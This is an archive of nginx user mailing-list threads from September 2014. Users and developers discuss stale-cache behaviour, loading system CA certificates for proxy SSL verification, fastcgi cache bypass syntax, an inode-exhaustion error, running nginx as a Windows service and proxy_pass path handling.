<82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> Maxim Dounin Wrote: > nginx needs a client request to be able to request a > resource from a backend and to save it to the cache. I'm afraid my explanation wasn't clear enough. There's no need to make nginx able to make requests to fastcgi on it's own initiative. How it works today: A client makes a request. Nginx sees the cache has expired and issues a request to fastcgi. It takes some time and client is patiently *waiting*. Finally, after nginx gets a response from fastcgi app, it stores it in cache and sends it to the client. How it can be improved: A client makes a request. Nginx sees the cache has expired and issues a request to fastcgi. But nginx doesn't wait for fastcgi response, and *immediately* responds to the client with *stale* cache contents (if it exists). Client is like "whoa, that was fast!". And later, eventually, nginx gets a response from fastcgi app and updates cache. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253165,253171#msg-253171 From michal at 3scale.net Wed Sep 10 22:56:29 2014 From: michal at 3scale.net (Michal Cichra) Date: Thu, 11 Sep 2014 00:56:29 +0200 Subject: Using default CA path from openssl Message-ID: Hi, first I would like to thank for the proxy ssl verification that landed in nginx 1.7. Regarding that, there is one slight problem I?ve found, when creating a proxy, that dynamically accesses different hosts. The configuration is limited to setting a certificate and does not use CA path at all. Openssl has compiled in default where is default CA path and on some distributions it points to system trusted CA store. What I propose is a configuration flag, to set `SSL_CTX_set_default_verify_paths`. My not polished patch is: --- bundle/nginx-1.7.4/src/event/ngx_event_openssl.c.orig 2014-09-10 23:33:09.000000000 +0200 +++ bundle/nginx-1.7.4/src/event/ngx_event_openssl.c 2014-09-10 23:33:49.000000000 +0200 @@ -498,6 +498,7 @@ SSL_CTX_set_verify_depth(ssl->ctx, depth); if (cert->len == 0) { + SSL_CTX_set_default_verify_paths(ssl->ctx); return NGX_OK; } When there is no certificate, load defaults. That certainly has some drawbacks. So I would propose something like `proxy_ssl_trusted_certificate system;`. What do you think? It could increase the memory load, but it is really convenient for general ssl verification. Other proposed solution ( https://groups.google.com/forum/#!topic/openresty-en/SuqORBK9ys0 ) was to export system certificates, and load them from one file. That does not work for me, as I need to make reusable nginx configuration, that can be deployed on many platforms and it would be hard to instruct people how to do it. Best, Michal Cichra From e1c1bac6253dc54a1e89ddc046585792 at posteo.net Thu Sep 11 03:14:58 2014 From: e1c1bac6253dc54a1e89ddc046585792 at posteo.net (Philipp) Date: Thu, 11 Sep 2014 05:14:58 +0200 Subject: Using default CA path from openssl In-Reply-To: References: Message-ID: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> Am 11.09.2014 00:56 schrieb Michal Cichra: > What I propose is a configuration flag, to set > `SSL_CTX_set_default_verify_paths`. Careful what you wish for.. I didnt check the surrounding code, but above call and CAfile/CApath sets (if cmd-line or via API wont matter) has "funny" error conditions; see this post and the thread: http://marc.info/?l=openbsd-tech&m=140646297120492&w=2 Just a 2ct heads up. From mylich119 at 126.com Thu Sep 11 07:09:00 2014 From: mylich119 at 126.com (mylich119) Date: Thu, 11 Sep 2014 15:09:00 +0800 Subject: help for tcpinfo Message-ID: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> hi everyone, now I am trying to use $tcpinfo_rtt in the nginx.conf, but it can not be recognized. below is my envioroment. and when I built nginx 1.6.1, it said "checking for TCP_INFO ... not found " [lichuanhui at yptest01v ~/nginx-1.6.1]$ cat /etc/redhat-release CentOS release 5.4 (Final) [lichuanhui at yptest01v ~/nginx-1.6.1]$ uname -a Linux yptest01v.add.corp.qihoo.net 2.6.18-164.el5xen #1 SMP Thu Sep 3 04:03:03 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux 2014-09-11 mylich119 -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Thu Sep 11 09:01:00 2014 From: artemrts at ukr.net (wishmaster) Date: Thu, 11 Sep 2014 12:01:00 +0300 Subject: fastcgi_cache_bypass. Need some explain. Message-ID: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> Hi, I am attempting to configure nginx to avoid caching some data. map $http_x_requested_with $no_cache { default 0; "XMLHttpRequest" 1; } fastcgi_cache_bypass $no_cache; fastcgi_no_cache $no_cache; With above configuration exceptions works fine, but with below - not. Why? fastcgi_cache_bypass $http_x_requested_with; fastcgi_no_cache $http_x_requested_with; With above config all requests (not only with "X-Requested-With: XMLHttpRequest") is bypassed. -- Cheers, Vit From vbart at nginx.com Thu Sep 11 10:55:21 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 11 Sep 2014 14:55:21 +0400 Subject: help for tcpinfo In-Reply-To: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> References: <62be3acd.3cb9.148638b383f.Coremail.mylich119@126.com> Message-ID: <2715310.p2f0aje3RQ@vbart-workstation> On Thursday 11 September 2014 15:09:00 mylich119 wrote: > hi everyone, > now I am trying to use $tcpinfo_rtt in the nginx.conf, but it can not be > recognized. > > below is my envioroment. and when I built nginx 1.6.1, it said "checking for > TCP_INFO ... not found " > > [lichuanhui at yptest01v ~/nginx-1.6.1]$ cat /etc/redhat-release > CentOS release 5.4 (Final) > [lichuanhui at yptest01v ~/nginx-1.6.1]$ uname -a > Linux yptest01v.add.corp.qihoo.net 2.6.18-164.el5xen #1 SMP Thu Sep 3 > 04:03:03 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux > > That's what usually happens when you're using ancient OS. If I'm not mistaken, you need glibc 2.7 or later. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Thu Sep 11 13:27:52 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Thu, 11 Sep 2014 09:27:52 -0400 Subject: Windows 2008 - logging off kills nignx In-Reply-To: References: Message-ID: Thank you. Seems awkward to set it as a service... in windows. I see 3rd party solutions to automate niginx as a service... but that seems strange. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253181#msg-253181 From mdounin at mdounin.ru Thu Sep 11 13:42:49 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 17:42:49 +0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> References: <20140910170130.GR59236@mdounin.ru> <82300b971a0ea78ecdf89830eb4eeeee.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140911134249.GX59236@mdounin.ru> Hello! On Wed, Sep 10, 2014 at 03:27:10PM -0400, nanochelandro wrote: > Maxim Dounin Wrote: > > nginx needs a client request to be able to request a > > resource from a backend and to save it to the cache. > > I'm afraid my explanation wasn't clear enough. > There's no need to make nginx able to make requests to fastcgi on it's own > initiative. > > How it works today: > A client makes a request. Nginx sees the cache has expired and issues a > request to fastcgi. It takes some time and client is patiently *waiting*. > Finally, after nginx gets a response from fastcgi app, it stores it in cache > and sends it to the client. > > How it can be improved: > A client makes a request. Nginx sees the cache has expired and issues a > request to fastcgi. But nginx doesn't wait for fastcgi response, and > *immediately* responds to the client with *stale* cache contents (if it > exists). Client is like "whoa, that was fast!". And later, eventually, nginx > gets a response from fastcgi app and updates cache. Uhm, it looks like I wasn't clear enough. What you suggest is perfectly understood, thanks (and I believe there is even an enhancement ticket in trac about this). The problem is that nginx needs a request object (and a connection object) to get/cache a response, and returning a stale cached response means the request object will be used to send the cached response. -- Maxim Dounin http://nginx.org/ From miguelmclara at gmail.com Thu Sep 11 13:45:33 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Thu, 11 Sep 2014 14:45:33 +0100 Subject: Windows 2008 - logging off kills nignx In-Reply-To: References: Message-ID: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> On September 11, 2014 2:27:52 PM GMT+01:00, ronlemonz wrote: >Thank you. Seems awkward to set it as a service... in windows. Why? Doesn't windows run other services? Ex: IIS Actually I'd prefer of windows and run less services by deafault I always have to do some cleaning, but its worst in desktop than server versions ofc. > I see >3rd >party solutions to automate niginx as a service... but that seems >strange. > you can also simple schedule a task that runs a batch file. Im not running any windows servers with nginx at the moment but I tested a while ago with https://github.com/mike-pt/NginxService (please follow the link to the original repo by sneal) and see if that works for you. >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253161,253181#msg-253181 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. From nginx-forum at nginx.us Thu Sep 11 14:12:58 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Thu, 11 Sep 2014 10:12:58 -0400 Subject: Windows 2008 - logging off kills nignx In-Reply-To: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> References: <84d1c351-4203-4cb2-b364-3ecd3d08c33e@email.android.com> Message-ID: Sorry, I think I might have it now. Trying to re-create a dev server based on a prod server. I went through setting by setting comparing both servers... waiting to see if it runs during the night. I think the run as "SYSTEM" is the answer. So I can log off and it should work (i hope0. Thanks for the help, Ron Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253184#msg-253184 From nginx-forum at nginx.us Thu Sep 11 14:15:43 2014 From: nginx-forum at nginx.us (arraisgabriel) Date: Thu, 11 Sep 2014 10:15:43 -0400 Subject: "No space left on device" for temp cache - v1.7.4 Message-ID: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> Hi, recently we noticed that the version 1.7.3 added a feature important to our infrastructure: "cache revalidation now uses If-None-Match header if possible.". So we changed part of our cache to the 1.7.4 version, but something strange started to happen, at certain point of disk usage nginx started to return 500 to all requests with this kind of message in the error log: [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed (28: No space left on device) while reading upstream, client: xxx.xxx.xxx.xxx, server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" It looked like that there wasn't enough space in the temporary cache directory. But running df -h (and after sync && df -h) the result was: [user at nginx ~]$ df -h Filesystem Size Used Avail Use% Mounted on /dev/xvda1 7.8G 2.3G 5.4G 30% / devtmpfs 3.7G 20K 3.7G 1% /dev tmpfs 3.7G 0 3.7G 0% /dev/shm /dev/xvdb 40G 12G 27G 31% 24% /cache ---------------------------------------- used for cache I think that is important to know that a very similar configuration is running well in a 1.7.2 server with the same specs and without the cache revalidation directives. This is my cache path configuration: proxy_cache_path /cache/nginx levels=1:2 keys_zone=cache:1500m max_size=27G inactive=1200m; Can you help? Gabriel Arrais. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253185,253185#msg-253185 From michal at 3scale.net Thu Sep 11 14:17:27 2014 From: michal at 3scale.net (Michal Cichra) Date: Thu, 11 Sep 2014 16:17:27 +0200 Subject: Using default CA path from openssl In-Reply-To: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> References: <55ec85dedb7a4c5e5f46d10ee14a40d3@posteo.de> Message-ID: <6CAE16A1-4638-454A-A13B-F7623C44F445@3scale.net> Yes, the s_client and s_server core is ? There are even bugs filled https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/396818 But this is different. The SSL_CTX_set_default_verify_paths does not have a bug, but the usage of it is wrong. Cheers. On 11 Sep 2014, at 05:14, Philipp wrote: > Am 11.09.2014 00:56 schrieb Michal Cichra: >> What I propose is a configuration flag, to set >> `SSL_CTX_set_default_verify_paths`. > > Careful what you wish for.. > > I didnt check the surrounding code, but above call and CAfile/CApath sets (if cmd-line or via API wont matter) > has "funny" error conditions; see this post and the thread: > http://marc.info/?l=openbsd-tech&m=140646297120492&w=2 > > Just a 2ct heads up. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Sep 11 14:29:53 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 18:29:53 +0400 Subject: fastcgi_cache_bypass. Need some explain. In-Reply-To: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> References: <1410425474.167438742.fcrqx0l7@frv34.fwdcdn.com> Message-ID: <20140911142952.GY59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 12:01:00PM +0300, wishmaster wrote: > Hi, > > I am attempting to configure nginx to avoid caching some data. > > map $http_x_requested_with $no_cache { > default 0; > "XMLHttpRequest" 1; > } > > fastcgi_cache_bypass $no_cache; > fastcgi_no_cache $no_cache; > > With above configuration exceptions works fine, but with below - not. Why? > > fastcgi_cache_bypass $http_x_requested_with; > fastcgi_no_cache $http_x_requested_with; > > With above config all requests (not only with "X-Requested-With: XMLHttpRequest") is bypassed. Most likely there is some subtle error in the configuration - e.g., missing ";" after fastcgi_cache_bypass. The fastcgi_cache_bypass gets an arbitrary number of arbitrary parameters, and something like: fastcgi_cache_bypass $http_x_requested_with fastcgi_no_cache $http_x_requested_with; is perfectly valid from syntax point of view, but really means fastcgi_cache_bypass with the "$http_x_requested_with", "fastcgi_no_cache" and "$http_x_requested_with" parameters. And the "fastcgi_no_cache" parameter is always true, hence all requests bypass the cache. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Sep 11 14:37:50 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 18:37:50 +0400 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> References: <506ae84bd2cfd6713a098f184c32a619.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140911143750.GZ59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > Hi, recently we noticed that the version 1.7.3 added a feature important to > our infrastructure: "cache revalidation now uses If-None-Match header if > possible.". > So we changed part of our cache to the 1.7.4 version, but something strange > started to happen, at certain point of disk usage nginx started to return > 500 to all requests with this kind of message in the error log: > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed (28: No > space left on device) while reading upstream, client: xxx.xxx.xxx.xxx, > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > It looked like that there wasn't enough space in the temporary cache > directory. But running df -h (and after sync && df -h) the result was: > > [user at nginx ~]$ df -h > Filesystem Size Used Avail Use% Mounted on > /dev/xvda1 7.8G 2.3G 5.4G 30% / > devtmpfs 3.7G 20K 3.7G 1% /dev > tmpfs 3.7G 0 3.7G 0% /dev/shm > /dev/xvdb 40G 12G 27G 31% 24% /cache > ---------------------------------------- used for cache ENOSPC from open() likely means you've run out of inodes, not disk space. Try looking into "df -i", it may be helpful. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Sep 11 15:00:08 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 11 Sep 2014 19:00:08 +0400 Subject: Using default CA path from openssl In-Reply-To: References: Message-ID: <20140911150007.GA59236@mdounin.ru> Hello! On Thu, Sep 11, 2014 at 12:56:29AM +0200, Michal Cichra wrote: > Hi, > > first I would like to thank for the proxy ssl verification that > landed in nginx 1.7. > > Regarding that, there is one slight problem I?ve found, when > creating a proxy, that dynamically accesses different hosts. > The configuration is limited to setting a certificate and does > not use CA path at all. > > Openssl has compiled in default where is default CA path and on > some distributions it points to system trusted CA store. > > What I propose is a configuration flag, to set > `SSL_CTX_set_default_verify_paths`. > > My not polished patch is: > --- bundle/nginx-1.7.4/src/event/ngx_event_openssl.c.orig 2014-09-10 23:33:09.000000000 +0200 > +++ bundle/nginx-1.7.4/src/event/ngx_event_openssl.c 2014-09-10 23:33:49.000000000 +0200 > @@ -498,6 +498,7 @@ > SSL_CTX_set_verify_depth(ssl->ctx, depth); > > if (cert->len == 0) { > + SSL_CTX_set_default_verify_paths(ssl->ctx); > return NGX_OK; > } > > When there is no certificate, load defaults. That certainly has > some drawbacks. So I would propose something like > `proxy_ssl_trusted_certificate system;`. > > What do you think? It could increase the memory load, but it is > really convenient for general ssl verification. Special value to load system default CA certs may make sense. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Sep 11 15:14:49 2014 From: nginx-forum at nginx.us (arraisgabriel) Date: Thu, 11 Sep 2014 11:14:49 -0400 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <20140911143750.GZ59236@mdounin.ru> References: <20140911143750.GZ59236@mdounin.ru> Message-ID: <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Thank you very much for the quick response. It looks like that the cache now stores many small files because of the revalidation feature, and reached the inode storage limit. Maxim Dounin Wrote: ------------------------------------------------------- > Hello! > > On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > > > Hi, recently we noticed that the version 1.7.3 added a feature > important to > > our infrastructure: "cache revalidation now uses If-None-Match > header if > > possible.". > > So we changed part of our cache to the 1.7.4 version, but something > strange > > started to happen, at certain point of disk usage nginx started to > return > > 500 to all requests with this kind of message in the error log: > > > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed > (28: No > > space left on device) while reading upstream, client: > xxx.xxx.xxx.xxx, > > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > > > It looked like that there wasn't enough space in the temporary cache > > directory. But running df -h (and after sync && df -h) the result > was: > > > > [user at nginx ~]$ df -h > > Filesystem Size Used Avail Use% Mounted on > > /dev/xvda1 7.8G 2.3G 5.4G 30% / > > devtmpfs 3.7G 20K 3.7G 1% /dev > > tmpfs 3.7G 0 3.7G 0% /dev/shm > > /dev/xvdb 40G 12G 27G 31% 24% /cache > > ---------------------------------------- used for cache > > ENOSPC from open() likely means you've run out of inodes, not disk > space. Try looking into "df -i", it may be helpful. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253185,253192#msg-253192 From r_o_l_a_n_d at hotmail.com Thu Sep 11 15:33:27 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Thu, 11 Sep 2014 18:33:27 +0300 Subject: Query_String not matching Message-ID: Hello, I am obviously a new nginx user, so please bear with me. I have setup nginx as a content caching service, running on port 80 and directing traffic to backend servers. all works okay, though one specific scenario where i want to cache an object matching a specific query string. Here's a sample: .../ getimage.view&id=19823&class=5617&size=80? I want to cache objecting matching : class=5617&size=80? since obviously the ID will change depending on user. i googled ?nginx config,etc... everything i found simply explains that i could match $uri and $args but not how to bypass args? i tried the following: ?if ($uri ~* "^getimage.view") { ? set $args $2$3; ? set $cache_key $scheme$host$uri$is_args$args; ? ? } But it's not working.... any advice? or better yet any place i can learn more about manipulating query strings ? Thanks in advance.? From nginx-forum at nginx.us Thu Sep 11 20:42:51 2014 From: nginx-forum at nginx.us (nfn) Date: Thu, 11 Sep 2014 16:42:51 -0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <20140908115057.GA59236@mdounin.ru> References: <20140908115057.GA59236@mdounin.ru> Message-ID: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Hi, Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS Can you help me understand why I have these random 502 error? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253202#msg-253202 From miguelmclara at gmail.com Thu Sep 11 23:53:02 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Fri, 12 Sep 2014 00:53:02 +0100 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: What do you see in the php-fpm logs? Maybe the php-fpm processes are not enough to handle the requests. On September 11, 2014 9:42:51 PM GMT+01:00, nfn wrote: >Hi, > >Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > >Can you help me understand why I have these random 502 error? > >Thanks > >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253117,253202#msg-253202 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From root at xtremenitro.org Fri Sep 12 01:27:43 2014 From: root at xtremenitro.org (NitrouZ) Date: Fri, 12 Sep 2014 08:27:43 +0700 Subject: "No space left on device" for temp cache - v1.7.4 In-Reply-To: <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> References: <20140911143750.GZ59236@mdounin.ru> <4fc16d1afda3b103337beeef19a26d95.NginxMailingListEnglish@forum.nginx.org> Message-ID: What file system do you use for cache? Try using xfs instead ext4. Xfs have better inode storage than ext4. On Thursday, September 11, 2014, arraisgabriel wrote: > Thank you very much for the quick response. It looks like that the cache > now stores many small files because of the revalidation feature, and > reached > the inode storage limit. > > > Maxim Dounin Wrote: > ------------------------------------------------------- > > Hello! > > > > On Thu, Sep 11, 2014 at 10:15:43AM -0400, arraisgabriel wrote: > > > > > Hi, recently we noticed that the version 1.7.3 added a feature > > important to > > > our infrastructure: "cache revalidation now uses If-None-Match > > header if > > > possible.". > > > So we changed part of our cache to the 1.7.4 version, but something > > strange > > > started to happen, at certain point of disk usage nginx started to > > return > > > 500 to all requests with this kind of message in the error log: > > > > > > [crit] 12908#0: *7209656 open() "/cache/nginx_tmp/0002938835" failed > > (28: No > > > space left on device) while reading upstream, client: > > xxx.xxx.xxx.xxx, > > > server: , request: "GET http://xxxxxxxx.net/ HTTP/1.1", upstream: > > > "http://xxx.xx.xxx.xxx:80/", host: "xxxxxxxx.net" > > > > > > It looked like that there wasn't enough space in the temporary cache > > > directory. But running df -h (and after sync && df -h) the result > > was: > > > > > > [user at nginx ~]$ df -h > > > Filesystem Size Used Avail Use% Mounted on > > > /dev/xvda1 7.8G 2.3G 5.4G 30% / > > > devtmpfs 3.7G 20K 3.7G 1% /dev > > > tmpfs 3.7G 0 3.7G 0% /dev/shm > > > /dev/xvdb 40G 12G 27G 31% 24% /cache > > > ---------------------------------------- used for cache > > > > ENOSPC from open() likely means you've run out of inodes, not disk > > space. Try looking into "df -i", it may be helpful. > > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253185,253192#msg-253192 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Sent from iDewangga Device -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 12 08:37:24 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Fri, 12 Sep 2014 04:37:24 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) Message-ID: Hi all, This is my first comment here, thanks in advance to all who contribute. I?m starting with nginx + php + fastCGI in windows environment, and I?m having following behaviour: I have two index.php files : /public/index.php /index.php The content of /index.php file is : ----------------------------- content ------------------------- ./public/index.php ------------------------------------------------------------------ As you can see the content of this PHP file don?t have block, just a relative link to another file, so I?m seeing two different behaviours in windows & linux. Windows) The text "./public/index.php" is showed in the browser and the php processing ends. Linux) This content is interpreted "like a link" to /public/index.php file and the content of /public/index.php is processed, without rendering the plain text "./public/index.php" like in windows. Any idea ? Perhaps it could be a trivial problem related only with PHP, but I?m just a beginner with both PHP and NGnix. Regards Antonio Fern?ndez www.jaraxa.com Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253207#msg-253207 From vbart at nginx.com Fri Sep 12 11:28:38 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 12 Sep 2014 15:28:38 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> References: <20140908115057.GA59236@mdounin.ru> <64d14f9fbecddd0a4f793c92e7886986.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1694211.Er3GKaG43R@vbart-workstation> On Thursday 11 September 2014 16:42:51 nfn wrote: > Hi, > > Here is the debug log: http://pastebin.com/raw.php?i=w8Bwj4pS > > Can you help me understand why I have these random 502 error? > > Thanks > Have you looked at dmesg? It doesn't look related to nginx. That can be caused by segfaults in php-fpm processes, so you should check what happens with them. wbr, Valentin V. Bartenev From dewanggaba at xtremenitro.org Sat Sep 13 09:46:56 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 16:46:56 +0700 Subject: Could Nginx redirected proxied traffic? Message-ID: <54141290.70300@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I have configuration like this : ... snip ... location /monitor { proxy_pass http://backend:6800/; proxy_redirect default; } ... snip ... Trying to access /monitor, it's works. But, I tried to access URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, the log said : ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" But, if I try to access them directly through port 6800 (traffic not proxied from nginx), everything works. I assume, that actually the backend support rewrite URL, but while proxied, the rewrite URL didn't works. Any hints? -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJUFBKPAAoJEEyntV5BtO+Q3bAH/RCUkGSFkuLWt0Rgefuh60VE yGxkXDhCa6BnO7Zv4VsvDb6XSYfax/qlmoIL5Grii5GfpjI4Rp3K6rR738JPqIM3 yd3DGmBOJPxPsenf5CFBofXi2k8KxyhSoJDXj9yZ6oszLNZ8JKYYQvIYSbMiqw4/ IMDmhGDHDVuhZB7zhxmxMrFWAn7B6UOuabd+Db3L7tpti1sLAdIkmOSXO+9CVAXA A+ihW1J717K02YK4MO4ycS+Zgz++SC7+nSESpna1+n+UR+ix4NeUo0wDMlhGjkpZ EHWEa5masuNHfXsURcPdzRIMn5IkPiV64WrEvFMN7QvUYgLDSxb8ezHzAg0SBcU= =OGrl -----END PGP SIGNATURE----- From vbart at nginx.com Sat Sep 13 10:29:31 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 13 Sep 2014 14:29:31 +0400 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <54141290.70300@xtremenitro.org> References: <54141290.70300@xtremenitro.org> Message-ID: <11383775.5OveutF6HL@vbart-laptop> On Saturday 13 September 2014 16:46:56 Dewangga wrote: > Hi, > > I have configuration like this : > > ... snip ... > location /monitor { > proxy_pass http://backend:6800/; > proxy_redirect default; > } > ... snip ... > > Trying to access /monitor, it's works. But, I tried to access URL > behind them, /monitor/logs/, /monitor/jobs/ it's error 404, the log said : > > ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ HTTP/1.1" 404 > 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux > x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" > ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET /jobs HTTP/1.1" 404 > 599 "http://engine.xtremenitro.org/monitor" "Mozilla/5.0 (X11; Linux > x86_64; rv:31.0) Gecko/20100101 Firefox/31.0" > > But, if I try to access them directly through port 6800 (traffic not > proxied from nginx), everything works. I assume, that actually the > backend support rewrite URL, but while proxied, the rewrite URL didn't > works. > > Any hints? > When you access it directly, what URI do you use? wbr, Valentin V. Bartenev From dewanggaba at xtremenitro.org Sat Sep 13 10:29:57 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 13 Sep 2014 17:29:57 +0700 Subject: Could Nginx redirected proxied traffic? In-Reply-To: <11383775.5OveutF6HL@vbart-laptop> References: <54141290.70300@xtremenitro.org> <11383775.5OveutF6HL@vbart-laptop> Message-ID: <54141CA5.1070703@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, The original URI is : http://engine.xtremenitro.org:6800/jobs http://engine.xtremenitro.org:6800/logs .. etc And if proxied, should be: http://engine.xtremenitro.org/monitor/jobs http://engine.xtremenitro.org/monitor/logs .. etc I want to close the unusual port, and proxied to nginx. So I can control the logs only from nginx. Is it possible? On 09/13/2014 05:29 PM, Valentin V. Bartenev wrote: > On Saturday 13 September 2014 16:46:56 Dewangga wrote: >> Hi, >> >> I have configuration like this : >> >> ... snip ... location /monitor { proxy_pass >> http://backend:6800/; proxy_redirect default; } ... snip ... >> >> Trying to access /monitor, it's works. But, I tried to access >> URL behind them, /monitor/logs/, /monitor/jobs/ it's error 404, >> the log said : >> >> ip.ad.dr.es - - [13/Sep/2014:16:42:35 +0700] "GET /logs/ >> HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >> Firefox/31.0" ip.ad.dr.es - - [13/Sep/2014:16:45:24 +0700] "GET >> /jobs HTTP/1.1" 404 599 "http://engine.xtremenitro.org/monitor" >> "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 >> Firefox/31.0" >> >> But, if I try to access them directly through port 6800 (traffic >> not proxied from nginx), everything works. I assume, that >> actually the backend support rewrite URL, but while proxied, 